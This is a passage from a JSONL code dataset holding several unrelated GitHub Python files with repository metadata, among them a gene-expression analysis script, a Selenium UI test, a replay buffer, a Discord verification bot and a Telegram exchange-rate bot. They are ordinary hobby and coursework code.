pd.read_excel(\"GPL570-55999.xlsx\", index_col=\"ID\")\r\n\r\ntumor_stage_na = np.where(var_table[\"Var_05_tnm.stage\"].values == 'N/A', True, False)\r\ntumor_stage_0 = np.where(var_table[\"Var_05_tnm.stage\"].values == 0, True, False)\r\ntumor_stage_1 = np.where(var_table[\"Var_05_tnm.stage\"].values == 1, True, False)\r\nt01_or = np.logical_or(tumor_stage_0, tumor_stage_1)\r\n\r\nt01_or_X = matrix_table.iloc[:, t01_or]\r\nt01_or_y = var_table[\"Var_05_tnm.stage\"][t01_or]\r\n\r\nprint(\"# of stage0: {0} / # of stage1: {1}\".format(tumor_stage_0.sum(), tumor_stage_1.sum()))\r\nprint(\"Total # of stage01_data: {}\".format(t01_or.sum()))\r\n\r\n\r\ntumor = {}\r\nfor i in range(t01_or_X.shape[0]):\r\n X, y = t01_or_X.iloc[i, :].values, list(t01_or_y)\r\n X = sm.add_constant(X)\r\n X[:,1] = 0 #remove NaN to 0\r\n model = sm.OLS(y, X)\r\n result = model.fit()\r\n tumor[t01_or_X.index[i]] = float(result.t_test([1, 0]).pvalue)\r\n\r\nprint(len(tumor))\r\n\r\ntumor_sort = sorted(tumor.items(), key=lambda item: item[1])\r\n\r\ntumor_p_value = np.array(list(tumor.values()), dtype=np.float)\r\nprint(np.sum(np.where(tumor_p_value < 0.001, 1, 0)))\r\n\r\nsignificant_probe = list()\r\nfor dt in tumor_sort:\r\n if 
dt[1] < 0.001:\r\n significant_probe.append(dt[0])\r\n\r\ngpl_drop = gpl.loc[significant_probe, \"Gene Symbol\"].values\r\nunique_gene = set()\r\nfor i in gpl_drop:\r\n if type(i) == str:\r\n id_list = list(i.split(\" /// \"))\r\n unique_gene.add(id_list[0])\r\n else:\r\n pass\r\nlen(unique_gene)\r\n\r\ntop10 = list()\r\ni = 0\r\nwhile len(top10) < 10:\r\n probe_name = tumor_sort[i][0]\r\n i += 1\r\n candidate = gpl.loc[probe_name, \"Gene Symbol\"]\r\n if candidate in top10 or candidate is np.nan:\r\n continue\r\n else:\r\n top10.append(candidate)\r\n\r\nprint(top10)\r\n\r\n#(used code) – t-test\r\nbenign = np.logical_or(np.where(var_table[\"Var_05_tnm.stage\"].values == 0, True, False),\r\n np.where(var_table[\"Var_05_tnm.stage\"].values == 1, True, False))\r\nbenign = np.logical_or(benign, np.where(var_table[\"Var_05_tnm.stage\"].values == 2, True, False))\r\nbenign_matrix = matrix_table.iloc[:, benign]\r\nmalignant = np.logical_or(np.where(var_table[\"Var_05_tnm.stage\"].values == 3, True, False),\r\n np.where(var_table[\"Var_05_tnm.stage\"].values == 4, True, False))\r\nmalignant_matrix = matrix_table.iloc[:, malignant]\r\n\r\nprint(\"# of benign: {0} / # of malignant: {1}\".format(benign.sum(), malignant.sum()))\r\n\r\nmalig_p_value_dict = {}\r\nfor i in range(benign_matrix.shape[0]):\r\n M_data, WT_data = benign_matrix.iloc[i, :].values, malignant_matrix.iloc[i, :].values\r\n static, p_value = stats.ttest_ind(M_data, WT_data)\r\n malig_p_value_dict[benign_matrix.index[i]] = float(p_value)\r\n\r\nmalig_p_value_dict_sort = sorted(malig_p_value_dict.items(), key=lambda item: item[1])\r\n\r\nmalig_p_value = np.array(list(malig_p_value_dict.values()), dtype=np.float)\r\nprint(np.sum(np.where(malig_p_value < 0.001, 1, 0)))\r\n\r\n\r\nsignificant_probe = list()\r\nfor dt in malig_p_value_dict_sort:\r\n if dt[1] < 0.001:\r\n significant_probe.append(dt[0])\r\n\r\ngpl_drop = gpl.loc[significant_probe, \"Gene Symbol\"].values\r\nunique_gene = set()\r\nfor i in gpl_drop:\r\n if type(i) == str:\r\n id_list = list(i.split(\" /// \"))\r\n unique_gene.add(id_list[0])\r\n else:\r\n pass\r\nlen(unique_gene)\r\n\r\ntop10 = list()\r\ni = 0\r\nwhile len(top10) < 10:\r\n probe_name = malig_p_value_dict_sort[i][0]\r\n i += 1\r\n candidate = gpl.loc[probe_name, \"Gene Symbol\"]\r\n if candidate in top10 or candidate is np.nan:\r\n continue\r\n else:\r\n top10.append(candidate)\r\n\r\nprint(top10)\r\n\r\n\r\n\r\nprint(\"#5#######################################################\")\r\nentrez = pd.read_csv(\"c5.all.v7.4.entrez.gmt.csv\", header=None, index_col=0)\r\nentrez_p_value = {}\r\n\r\nmalig_entrez = list()\r\ni = 0\r\nwhile malig_p_value_dict_sort[i][1] < 0.001:\r\n probe_name = malig_p_value_dict_sort[i][0]\r\n i += 1\r\n candidate = gpl.loc[probe_name, \"ENTREZ_GENE_ID\"]\r\n if candidate is np.nan:\r\n continue\r\n else:\r\n if type(candidate) == str:\r\n candidate = candidate.split(\" /// \")[0]\r\n malig_entrez.append(candidate)\r\n\r\nmalig_size = len(np.unique(malig_entrez))\r\n\r\n\r\ngene_id = gpl[\"ENTREZ_GENE_ID\"].values\r\nunique_gene = set()\r\nfor i in gene_id:\r\n if type(i) == str:\r\n id_list = list(i.split(\" /// \"))\r\n unique_gene.add(id_list[0])\r\n elif type(i) == int:\r\n unique_gene.add(i)\r\n else:\r\n continue\r\nentrez_size = len(unique_gene)\r\nunique_gene = np.array(list(unique_gene))\r\n\r\nfor i in range(entrez.shape[0]):\r\n if entrez.index[i][:2] == \"GO\":\r\n info = entrez.iloc[i, :].values\r\n info = info[~np.isnan(info)].astype(np.int32)\r\n a = 
len(np.unique(np.intersect1d(malig_entrez, info)))\r\n b = len(np.unique(np.intersect1d(unique_gene, info)))\r\n #print(a, b)\r\n _, pvalue = stats.fisher_exact([[a, b], [malig_size - a, entrez_size - b]])\r\n entrez_p_value[entrez.index[i]] = pvalue\r\n\r\n\r\nentrez_p_value_dict_sort = sorted(entrez_p_value.items(), key=lambda item: item[1])\r\n\r\nentrez_p_value = np.array(list(entrez_p_value.values()), dtype=np.float)\r\nprint(np.sum(np.where(entrez_p_value < 0.001, 1, 0)))\r\n\r\nfor i in range(10):\r\n print(entrez_p_value_dict_sort[i])\r\n'''\r\ngo_table = pd.read_csv(\"c5.all.v7.4.entrez.gmt.csv\", header=None, index_col=0).T\r\n\r\ngo_table_pvalue = {}\r\n\r\n\r\n#malig = tumor 3 4 stage\r\nmalig = list()\r\ni =0\r\nwhile malig_p_value_dict_sort[i][1] <0.001:\r\n probe_name = malig_p_value_dict_sort[i][0]\r\n i += 1\r\n candidate = gpl.loc[probe_name, \"ENTREZ_GENE_ID\"] #mapping gpl and GO_id\r\n if candidate is np.nan:\r\n continue #nan exception handling\r\n else:\r\n if type(candidate) == str:\r\n candidate = candidate.split(\" /// \")[0] #remove useless genes after ///\r\n malig.append(candidate)\r\n\r\nmalig_size = len(np.unique(malig)) #unique gene size_malig go table\r\nprint(\"malig_unique gene size:{}\",malig_size) #1633\r\n\r\ngene_id = gpl[\"ENTREZ_GENE_ID\"].values\r\nunique_gene_go = set()\r\nfor i in gene_id:\r\n if type(i) == str:\r\n id_list = list(i.split(\" /// \"))\r\n unique_gene_go.add(id_list[0])\r\n elif type(i) == int:\r\n unique_gene_go.add(i)\r\n else:\r\n continue\r\ngo_table_size = len(np.unique(unique_gene_go)) #unique gene size in gpl #21180\r\nunique_gene_go = np.array(list(unique_gene_go)) #len: 21712\r\n\r\nfor i in range(go_table.shape[0]):\r\n if go_table.index[i][:2] == \"GO\":\r\n info = go_table.iloc[i, :].values\r\n info = info[~np.isnan(info)].astype(np.int32)\r\n a = len(np.unique(np.intersect1d(malig, info)))\r\n b = len(np.unique(np.intersect1d(unique_gene, info)))\r\n print(a, b)\r\n _, pvalue = stats.fisher_exact([[a, b], [malig_size - a, go_table_size - b]])\r\n go_table_pvalue[go_table.index[i]] = pvalue\r\n'''\r\n","repo_name":"SOOJEONGKIMM/Bioinformatics","sub_path":"four.py","file_name":"four.py","file_ext":"py","file_size_in_byte":7155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27311936326","text":"import pytest\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom settings import *\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ndef test_show_my_pets():\n # Enter the email\n pytest.driver.find_element(By.ID, 'email').send_keys(valid_email)\n # Enter the password\n pytest.driver.find_element(By.ID, 'pass').send_keys(valid_password)\n # Click the login button\n pytest.driver.find_element(By.CSS_SELECTOR, 'button[type=\"submit\"]').click()\n # Click the \"My pets\" button\n WebDriverWait(pytest.driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//a[contains(text(), \"Мои питомцы\")]'))\n ).click()\n\n # Collect the pets' names, photos, breeds and ages\n names = WebDriverWait(pytest.driver, 10).until(\n EC.presence_of_all_elements_located((By.XPATH, '//*[@id=\"all_my_pets\"]/table/tbody/tr/td[1]'))\n )\n\n species = WebDriverWait(pytest.driver, 10).until(\n EC.presence_of_all_elements_located((By.XPATH, '//*[@id=\"all_my_pets\"]/table/tbody/tr/td[2]'))\n )\n\n ages = WebDriverWait(pytest.driver, 10).until(\n EC.presence_of_all_elements_located((By.XPATH, '//*[@id=\"all_my_pets\"]/table/tbody/tr/td[3]'))\n )\n\n images = WebDriverWait(pytest.driver, 10).until(\n EC.presence_of_all_elements_located((By.XPATH, '//*[@id=\"all_my_pets\"]/table/tbody/tr/th/img'))\n )\n\n # Get the number of pets from the user's statistics\n pets_amount = int(pytest.driver.find_element(By.XPATH, '/html/body/div[1]/div/div[1]').text.split()[2])\n # Compare the number of names with the number of pets from the user's statistics\n assert len(names) == pets_amount\n\n # Count the pets that have a photo\n count_images = 0\n for i in range(len(images)):\n if images[i].get_attribute('src'):\n count_images += 1\n # Make sure at least half of the pets have a photo\n assert count_images >= pets_amount / 2\n\n # Count the non-empty elements of the lists\n count_names = 0\n for i in range(len(names)):\n if names[i].text:\n count_names += 1\n count_species = 0\n for i in range(len(species)):\n if species[i].text:\n count_species += 1\n count_ages = 0\n for i in range(len(ages)):\n if ages[i].text:\n count_ages += 1\n # Make sure every pet has a name, age and breed.\n assert count_names == count_species == count_ages == pets_amount\n\n # Put all pet names into a list\n list_names = []\n for i in range(len(names)):\n list_names.append(names[i].text)\n # Make sure all pets have different names.\n assert len(list_names) == len(set(list_names))\n\n # Build a list of pet descriptions\n pet = []\n pets = []\n for i in range(len(names)):\n pet.append(names[i].text)\n pet.append(species[i].text)\n pet.append(ages[i].text)\n pets.append(tuple(pet))\n pet = []\n # Make sure the list has no duplicate pets (with identical name, breed and age).\n assert len(pets) == len(set(pets))\n","repo_name":"anatole365/PetFriendsUiTests","sub_path":"test_selenium_simple.py","file_name":"test_selenium_simple.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71007241014","text":"#!/usr/bin/python\n\n# The key idea is to count the number of points that are at least a given distance apart.\n# That distance is found with binary search.\n\nn, c = map(int, input().split())\nhouse_position = sorted([int(input()) for _ in range(n)])\ndistance_low = 1\ndistance_high = house_position[-1]\n\nanswer = 0\n\nwhile distance_low <= distance_high:\n distance = (distance_high+distance_low) // 2\n\n house_left = house_position[0]\n count = 1\n\n for i in range(1, n):\n house_right = house_position[i]\n\n if house_right - house_left >= distance:\n count += 1\n house_left = house_right\n\n if count >= c:\n answer = distance\n distance_low = distance + 1\n else:\n distance_high = distance - 1\n\nprint(answer)","repo_name":"c0natus/Practice","sub_path":"Algorithm-practice/BaekJoon/Sliver or less/B2110.py","file_name":"B2110.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"11450504563","text":"import cleanup\r\nimport globals\r\n\r\ndef combineTSV( sourceFiles, targetFile ):\r\n cleanup.createDirIfNotExist( globals.TSV_BIN )\r\n output = \"\"\r\n\r\n for file in sourceFiles:\r\n with open( file, \"r\" ) as f:\r\n for line in f:\r\n output += line.replace( \",\", \"\\t\") if file.endswith( \".csv\" ) else line \r\n \r\n if not targetFile.endswith( \".tsv\" ):\r\n targetFile = targetFile[ :targetFile.rfind( \".\" ) ] + \".tsv\"\r\n\r\n with open( globals.TSV_BIN + targetFile, \"w\" ) as o:\r\n for line in output:\r\n o.write( line )\r\n 
","repo_name":"adsuth/VGMU-batchTSVParser","sub_path":"songParser/tsv_combiner.py","file_name":"tsv_combiner.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72645279092","text":"from abc import ABC, abstractmethod\nimport os\nimport pickle as pkl\n\n\nclass ReplayBuffer(ABC):\n\n def __init__(\n self,\n monitor=None,\n logging_prefix=\"\"\n ):\n self.monitor = monitor\n self.logging_prefix = logging_prefix\n\n # storage structures for the samples collected\n self.observations = None\n self.actions = None\n self.rewards = None\n self.terminals = None\n\n # parameters to indicate the size of the buffer\n self.head = 0\n self.size = 0\n self.total_steps = 0\n self.total_paths = 0\n\n def log(\n self\n ):\n if self.monitor is not None:\n # record the current size of the buffer\n self.monitor.record(self.logging_prefix + \"head\", self.head)\n self.monitor.record(self.logging_prefix + \"size\", self.size)\n\n # record the total amount of samples collected\n self.monitor.record(self.logging_prefix + \"total_steps\", self.total_steps)\n self.monitor.record(self.logging_prefix + \"total_paths\", self.total_paths)\n\n def save(\n self,\n logging_dir\n ):\n # save the replay buffer to disk\n replay_path = os.path.join(logging_dir, self.logging_prefix + \"replay.buffer\")\n if not os.path.exists(os.path.dirname(replay_path)):\n os.makedirs(os.path.dirname(replay_path))\n with open(replay_path, \"wb\") as f:\n state = dict(\n observations=self.observations,\n actions=self.actions,\n rewards=self.rewards,\n terminals=self.terminals,\n size=self.size,\n head=self.head,\n total_steps=self.total_steps,\n total_paths=self.total_paths)\n pkl.dump(state, f)\n\n def load(\n self,\n logging_dir\n ):\n # load the replay buffer from disk if it exists\n replay_path = os.path.join(logging_dir, self.logging_prefix + \"replay.buffer\")\n if os.path.exists(replay_path):\n with open(replay_path, \"rb\") as f:\n state = pkl.load(f)\n self.observations = state[\"observations\"]\n self.actions = state[\"actions\"]\n self.rewards = state[\"rewards\"]\n self.terminals = state[\"terminals\"]\n self.size = state[\"size\"]\n self.head = state[\"head\"]\n self.total_steps = state[\"total_steps\"]\n self.total_paths = state[\"total_paths\"]\n\n @abstractmethod\n def insert_path(\n self,\n observations,\n actions,\n rewards\n ):\n return NotImplemented\n\n @abstractmethod\n def sample(\n self,\n batch_size\n ):\n return NotImplemented\n","repo_name":"brandontrabucco/cs285","sub_path":"cs285/data/replay_buffers/replay_buffer.py","file_name":"replay_buffer.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7743673805","text":"#!/usr/bin/env python3\n\nimport sys, os, os.path, tempfile, shutil, time, datetime, re\n\nTODO='ToDo:'\nDID='Did:'\nTODO_RX = re.compile(r\"^{0}\\s*\".format(TODO))\nDID_RX = re.compile(r\"^{0}\\s*\".format(DID))\nSEP_START = \"^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^\\n\"\nSEP_END = \" ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^\\n\"\nDATE_FMT = \"%a %b %d %Y %I:%M:%S %p %Z\"\nMAX_SEARCH = 100 # lines\nDEBUG = os.environ.get('DEBUG', False)\n\ndef d(msg):\n if bool(DEBUG):\n print(\"{0}\".format(msg))\n sys.stderr.flush()\n\ndef show_usage():\n print(\"Usage: {0} \\n\".format(os.path.basename(sys.argv[0])))\n print(\"Where is a 
log file to be prefixed with ToDo/Did/DateTime\\n\")\n\n\ndef get_todo_regex():\n return TODO_RX\n\n\ndef get_did_regex():\n return DID_RX\n\n\ndef get_date_fmt():\n return DATE_FMT\n\n\ndef last_todo(logfile):\n d(\"Rewinding logfile to beginning, searching for the most recent TODO block\")\n logfile.seek(0)\n got_todo = False\n todo_lines = []\n _max = MAX_SEARCH\n for line in logfile:\n _max -= 1\n if _max <= 0:\n raise RuntimeError(\"Could not find complete TODO section in first {0} lines\".format(MAX_SEARCH))\n line = str(line)\n line_no = MAX_SEARCH-_max\n if get_did_regex().search(line):\n d(\"Found {0} todo lines total after searching {1} lines\".format(len(todo_lines), line_no))\n return todo_lines\n elif got_todo:\n if len(line.strip()) > 3:\n d(\"Found todo: '{0}' at line {1}\".format(line.rstrip(), line_no))\n todo_lines.append(line.rstrip())\n else:\n d(\"Skipping blank/short todo line {0}\".format(line_no))\n elif get_todo_regex().search(line):\n d(\"Found start of todo list at line {0}\".format(line_no))\n got_todo = True\n raise RuntimeError(\"End of file reached while searching for complete todo block\")\n\ndef last_date(logfile):\n d(\"Rewinding logfile to beginning, searching for the most recent date entry\")\n logfile.seek(0)\n fmt = get_date_fmt()\n _max = MAX_SEARCH\n for line in logfile:\n _max -= 1\n if _max <= 0:\n raise RuntimeError(\"Could not find a date line in first {0} lines\".format(MAX_SEARCH))\n try:\n found_date = datetime.datetime.strptime(str(line.strip()), fmt).date()\n d(\"Found date line {0}, parsed into {1}\".format(MAX_SEARCH-_max, found_date))\n return found_date\n except ValueError:\n continue\n\ndef get_prefix(todo):\n d(\"Formatting new section with {0} todo lines\".format(len(todo)))\n fmt = get_date_fmt()\n return (\"\\n\" # blank line\n \"{0}\\n\" # ToDo:\n \"{1}\" # todo items\n \"\\n\" # blank line\n \"\\n\" # blank line\n \"{2}\\n\" # Did:\n \"\\n\" # blank line\n \"\\n\" # blank line\n \"{3}\" # start line includes newline\n \"{4}\\n\" # date/time\n \"{5}\" # end line includes newline\n \"\\n\" # extra blank line\n \"\".format(TODO, \"\\n\".join(todo), DID,\n SEP_START, time.strftime(fmt), SEP_END))\n\nif __name__ == \"__main__\":\n d(\"Debugging enabled, parsing arguments\")\n if len(sys.argv) < 2:\n show_usage()\n sys.exit(1)\n d(\"Checking if it's Saturday or Sunday\")\n weekday = datetime.datetime.now().isoweekday()\n # 0=mon, 1=tue, 2=wed, 3=thu, 4=fri, 5=sat, 6=sun\n if weekday > 5: # After Friday\n d(\"Exiting, weekends are not workdays\")\n sys.exit(0)\n tmp = tempfile.NamedTemporaryFile(mode=\"wt\", encoding='utf8',\n prefix=os.path.basename(sys.argv[0]), suffix='.tmp')\n d(\"Opened temp file {0}\".format(tmp.name))\n logfile = open(sys.argv[1], \"rt\", encoding='utf8')\n d(\"Opened log file {0}\".format(logfile.name))\n if last_date(logfile) == datetime.datetime.now().date():\n d(\"File already contains entry for today, exiting.\")\n sys.exit(0)\n old_todo = last_todo(logfile)\n tmp.write(get_prefix(old_todo))\n tmp.flush()\n d(\"New entry added, copying old file contents into temp file\")\n logfile.seek(0)\n shutil.copyfileobj(logfile, tmp)\n logfile.close()\n tmp.flush()\n d(\"Creating backup of logfile with ~ suffix\")\n shutil.copy(sys.argv[1], sys.argv[1] + '~')\n d(\"Movin new logfile into place\")\n shutil.copy(tmp.name, 
sys.argv[1])\n","repo_name":"Yewess/home","sub_path":"bin/BrandNewDay.py","file_name":"BrandNewDay.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"30887068","text":"import discord\nfrom discord.utils import get\n\n# gets the Token from .env (more info in README and .env.example)\nf = open(\".env\")\nTOKEN = f.read()\n\n# Variables to change\nverify_channel_name = 'verify'\nverify_prefix = '!verify'\nverify_emoji = '✅'\nverify_role = 847062220328534036\nverify_permission = 'Admin'\n\n# create Bot Class\nclass VerifyBot(discord.Client):\n \n # set class variable 'role'\n role = 0\n\n # if the bot is ready\n async def on_ready(self):\n self.profile_picture = client.user.avatar_url\n print('Verify: logged in')\n\n # if someone reacted\n async def on_reaction_add(self, reaction, user):\n # if the message is in the verify channel\n if reaction.message.channel.name == verify_channel_name:\n # if the reaction is the verify reaction\n if str(reaction) == verify_emoji:\n # get the role\n self.role = discord.utils.get(user.guild.roles, id=verify_role)\n # give the user the role\n await user.add_roles(self.role)\n\n # if someone sends a message\n async def on_message(self, message):\n # get the channel\n channel = client.get_channel(message.channel.id)\n # if the channel is the right one\n if message.channel.name == verify_channel_name:\n # get the user\n user = message.author\n # get the role\n self.role = discord.utils.get(user.guild.roles, id=verify_role)\n\n # if someone wants to send the button\n if message.content == '!verify':\n\n # if the author has the permission to do that\n for role in user.roles:\n if str(role) == verify_permission:\n # delete the message\n await message.delete()\n\n # create the verify embed\n verify_embed = discord.Embed(colour=discord.Colour(0x29485e), description=\"By clicking/tapping on \" + verify_emoji + \" below, you agree with the rules on this server. You can also verify by typing agree if clicking/tapping the reaction doesn't work.\")\n\n verify_embed.set_author(name=\"Verify \", icon_url=self.profile_picture)\n # send the embed\n await channel.send(embed=verify_embed)\n \n # if someone types agree in the chat\n elif message.content == 'agree':\n # delete the message\n await message.delete()\n # give the verified role\n await user.add_roles(self.role)\n\n # if the message is another message\n elif message.content != '!verify' and message.author != client.user:\n await message.delete()\n\n\n elif message.author == client.user:\n channel = message.channel\n # add the button\n await message.add_reaction(verify_emoji)\n\n # if the message is with info\n if message.content == verify_prefix + ' info':\n # creates the info embed\n info_embed = discord.Embed(title=\"Here you can get the most information about this bot!\",\n colour=discord.Colour(0x29485e))\n info_embed.set_author(name=\"Verifybot Info\",\n icon_url=self.profile_picture)\n info_embed.add_field(name=\"General ❕:\",\n value=\"In general this bot is a private project. I made the bot in my freetime.\",\n inline=True)\n info_embed.add_field(name=\"Personalize ✏:\",\n value=\"You can personalize this bot by downloading the code from github (https://github.com/Fynnyx/discord.py-bots) and running it yourself.\",\n inline=True)\n info_embed.add_field(name='GitHub:',\n value='Want to use more bots? Visit https://github.com/Fynnyx/discord.py-bots to get more open source Discord bots.',\n inline=True)\n info_embed.add_field(name=\"Help Command 📜:\",\n value=\"The bot prefix is `\" + verify_prefix + \"`. You will use this in front of all other commands. More info you'll get by using `\" + verify_prefix + \" help`.\",\n inline=True)\n info_embed.add_field(name=\"Everything done? \", value=\"Have fun ❤\", inline=False)\n # sends the info embed\n await channel.send(embed=info_embed)\n\n if message.content == verify_prefix + ' help':\n # create the embed for help\n help_embed = discord.Embed(colour=discord.Colour(0x29485e))\n\n help_embed.set_author(name=\"Verifybot Help\",\n icon_url=self.profile_picture)\n\n help_embed.add_field(name=\"Send the verify button\",\n value=\"With `\" + verify_prefix + \"` You can send the verify button.\")\n help_embed.add_field(name=\"Agree to the rules\",\n value=\"By typing `agree` in the right channel, you agree to the rules\")\n # sends the embed\n await channel.send(embed=help_embed)\n\n\n\n\n# start the bot\nclient = VerifyBot()\nclient.run(TOKEN)","repo_name":"iWANTdata/discord.py-bots","sub_path":"verifybot/verify.py","file_name":"verify.py","file_ext":"py","file_size_in_byte":5362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"74864303731","text":"#! /usr/bin/env python3\n# coding:utf-8\nimport json\n\nimport tornado.web\nimport tornado.ioloop\nimport engine_for_cnn as engine\nimport tensorflow as tf\n\n\nclass MainHandler(tornado.web.RequestHandler):\n\n def get(self):\n text = self.get_argument('text')\n print(text)\n predict = self.classify(text)\n data = {\n 'text': text,\n 'predict': predict[0]\n }\n self.write(json.dumps({'data': data}).encode('utf-8'))\n\n def classify(self, text):\n sample = engine.text_tensor(text, engine.wv)\n tensor_proto = tf.contrib.util.make_tensor_proto(sample, shape=[1, len(sample[0]), 200])\n engine.request.inputs['x'].CopyFrom(tensor_proto)\n response = engine.stub.Predict(engine.request, 10.0)\n result = list(response.outputs['y'].int64_val)\n return result\n\n\ndef make_app():\n return tornado.web.Application([\n (r\"/predict\", MainHandler),\n ])\n\n\nif __name__ == '__main__':\n app = make_app()\n app.listen(909)\n print('listen start')\n tornado.ioloop.IOLoop.current().start()\n","repo_name":"Tryking/DeepLearning","sub_path":"text-antispam/serving/serving.py","file_name":"serving.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73536094453","text":"from cv2 import cv2\r\n\r\nimport numpy as np\r\n\r\ncv2.namedWindow(\"faceCatch\")\r\n\r\ncap=cv2.VideoCapture(0) \r\n# cap=cv2.VideoCapture(\"http://admin:admin@192.168.25.62:8081/video\") \r\n\r\n\r\nsuccess, frame = cap.read()\r\n\r\ncolor = (0,255,0)\r\n\r\nclassfier=cv2.CascadeClassifier(\"C:\\\\Users\\\\w_zhangtb\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python38\\\\Lib\\\\site-packages\\\\cv2\\\\data\\\\haarcascade_frontalface_alt.xml\")\r\n\r\nwhile success:\r\n\r\n success, frame = cap.read()\r\n\r\n size=frame.shape[:2]\r\n\r\n image=np.zeros(size,dtype=np.float16)\r\n\r\n frame = cv2.flip(frame, 1)\r\n\r\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\r\n cv2.equalizeHist(image, image)\r\n\r\n divisor=8\r\n\r\n h, w = size\r\n\r\n minSize =(w//divisor, h//divisor) \r\n\r\n faceRects = classfier.detectMultiScale(image, 1.2, 2, cv2.CASCADE_SCALE_IMAGE,minSize)\r\n\r\n if 
len(faceRects)>0:\r\n\r\n for faceRect in faceRects: \r\n\r\n x, y, w, h = faceRect\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), color)\r\n font = cv2.FONT_HERSHEY_SIMPLEX\r\n cv2.putText(frame, \"FaceShowing...\",(x + 40, y + 40), font, 0.7, (255,0,255),2)\r\n\r\n cv2.imshow(\"faceCatch\", frame)\r\n\r\n key=cv2.waitKey(10)\r\n\r\n c = chr(key & 255)\r\n\r\n if c in ['q', 'Q', chr(27)]:\r\n\r\n break\r\n\r\ncv2.destroyWindow(\"faceCatch\")","repo_name":"kingdeeztb/pythonapp","sub_path":"kface人脸识别/realFaceshow.py","file_name":"realFaceshow.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24984416427","text":"import telebot\nfrom telebot import types\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport decimal\n\nbot = telebot.TeleBot(\"\")\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True)\n item_1 = types.KeyboardButton(\"Exchange Rates\")\n item_2 = types.KeyboardButton(\"Weather Forecast\")\n markup.add(item_1)\n markup.add(item_2)\n name = message.from_user.first_name\n bot.send_message(message.chat.id, f'Hello {name}! My name is Randy_Rozz_Bot and I am a your personal bot! What do you want to know? Type \"/info\" for more information', reply_markup=markup)\n\n@bot.message_handler(commands=['info'])\ndef start_message(message):\n bot.send_message(message.chat.id, \"Exchange rates - to check today`s rates \\nWeather Forecast - to check today`s forecast\")\n\n@bot.message_handler(content_types='text')\ndef message_reply(message):\n if message.text == \"Exchange Rates\":\n\n html_bg = urlopen(\"https://myfin.by/bank/belgazprombank/usd\")\n soup_bg = BeautifulSoup(html_bg)\n tags = soup_bg.findAll(\"td\")\n buy_bg = tags[1].text\n sell_bg = tags[2].text\n\n bot.send_message(message.chat.id, f\"In Belgazprombank: buying rate - {buy_bg} BYN, selling rate - {sell_bg} BYN\")\n\n html_pr = urlopen(\"https://myfin.by/bank/priorbank/usd\")\n soup_pr = BeautifulSoup(html_pr)\n tags = soup_pr.findAll(\"td\")\n buy_pr = tags[1].text\n sell_pr = tags[2].text\n \n bot.send_message(message.chat.id, f\"In Priorbank: buying rate - {buy_pr} BYN, selling rate - {sell_pr} BYN\")\n\n buying_pr = decimal.Decimal(buy_pr)\n selling_pr = decimal.Decimal(sell_pr)\n buying_bg = decimal.Decimal(buy_bg)\n selling_bg = decimal.Decimal(sell_bg)\n\n if buying_pr - buying_bg > 0:\n bot.send_message(message.chat.id, f\"Best buying rate in Priorbank - {buy_pr} BYN!\")\n elif buying_pr - buying_bg == 0:\n bot.send_message(message.chat.id, f\"Buying rates are equal!\")\n else:\n bot.send_message(message.chat.id, f\"Best buying rate in Belgazprombank - {buy_bg} BYN!\")\n \n if selling_pr - selling_bg > 0:\n bot.send_message(message.chat.id, f\"Best selling rate in Belgazprombank - {sell_bg} BYN!\")\n elif selling_pr - selling_bg == 0:\n bot.send_message(message.chat.id, f\"Selling rates are equal!\")\n else:\n bot.send_message(message.chat.id, f\"Best selling rate in Priorbank - {sell_pr} BYN!\")\n \n if message.text == \"Weather Forecast\":\n\n html_weather = urlopen(\"https://mogilev.online/2022/11/16/252495.html\")\n soup_weather = BeautifulSoup(html_weather)\n tags_weather = soup_weather.findAll(\"li\", {\"class\": \"weather-temp\"})\n weather = tags_weather[0].text\n now = int(weather)\n\n if now <= 10:\n bot.send_message(message.chat.id, f\"Temperature now is {weather}, please, dress warmly!\")\n elif now > 10 
